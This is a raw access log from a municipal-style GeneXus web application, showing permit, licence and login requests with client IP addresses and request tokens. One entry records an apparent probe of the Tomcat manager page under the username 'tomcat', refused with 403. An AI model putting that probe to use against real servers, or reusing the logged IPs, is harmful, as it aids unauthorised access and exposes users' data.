190.171.141.138 - - [13/Aug/2024:10:12:40 -0300] "GET /cormun/servlet/permisogoce?30b3126a5f818f1fde1c5151fa7d3f498982912572cdcc532751e8c9def3847f36b4a9e60b9c0c08a0ceb37bde45b87388bf9b7dfa2ae7ccac044512db03e530,gx-no-cache=1723554696126 HTTP/1.1" 200 47
190.171.141.138 - - [13/Aug/2024:10:12:43 -0300] "POST /cormun/servlet/permisogoce?05bd123568b8ed5f85f6ee76f243fb03,INS,0,,,,gx-no-cache=1723554698152 HTTP/1.1" 200 93
190.171.141.138 - - [13/Aug/2024:10:12:43 -0300] "GET /cormun/servlet/hpexe_return? HTTP/1.1" 200 1006
190.171.141.138 - - [13/Aug/2024:10:12:43 -0300] "GET /cormun/servlet/trpermisosgoce HTTP/1.1" 200 12823
190.171.141.138 - - [13/Aug/2024:10:12:45 -0300] "GET /cormun/servlet/apermisogoceprn?11031552,P,20240813091141,PU HTTP/1.1" 200 1648
190.171.149.74 - - [13/Aug/2024:10:14:11 -0300] "POST /cormun/servlet/trpermisosgoce?12af84251cc6ca6c0ec6082259815439,gx-no-cache=1723554786161 HTTP/1.1" 200 5275
181.212.42.153 - - [13/Aug/2024:10:14:17 -0300] "GET /cormun/servlet/trlicencias? HTTP/1.1" 200 6058
181.212.42.153 - - [13/Aug/2024:10:14:17 -0300] "GET /cormun/servlet/hlogin HTTP/1.1" 200 1741
181.212.42.153 - - [13/Aug/2024:10:14:17 -0300] "GET /cormun/servlet/trlicencias? HTTP/1.1" 200 6050
181.212.42.153 - - [13/Aug/2024:10:14:22 -0300] "POST /cormun/servlet/hlogin?bfe1be0cb26608daca94eb70be5b6b51,gx-no-cache=1723554798823 HTTP/1.1" 200 90
181.212.42.153 - - [13/Aug/2024:10:14:22 -0300] "GET /cormun/servlet/hpexe_link HTTP/1.1" 200 953
181.212.42.153 - - [13/Aug/2024:10:14:22 -0300] "GET /cormun/servlet/hhome HTTP/1.1" 200 3967
181.212.42.153 - - [13/Aug/2024:10:14:22 -0300] "GET /cormun/static/hhome.js?20201215495544 HTTP/1.1" 200 777
181.212.42.153 - - [13/Aug/2024:10:14:22 -0300] "GET /cormun/static/gxcfg.js?20201215495537 HTTP/1.1" 200 953
181.212.42.153 - - [13/Aug/2024:10:14:35 -0300] "GET /cormun/servlet/trlicencias? HTTP/1.1" 200 18988
46.105.97.78 - tomcat [13/Aug/2024:10:15:12 -0300] "GET /manager/html HTTP/1.1" 403 3196
190.171.153.50 - - [13/Aug/2024:10:16:45 -0300] "POST /cormun/servlet/hlogin?47901e017db88ad8a212da440993912d,gx-no-cache=1723554940979 HTTP/1.1" 200 90
190.171.153.50 - - [13/Aug/2024:10:16:45 -0300] "GET /cormun/servlet/hpexe_link HTTP/1.1" 200 954
190.171.153.50 - - [13/Aug/2024:10:16:45 -0300] "GET /cormun/servlet/trlicencias HTTP/1.1" 200 10132
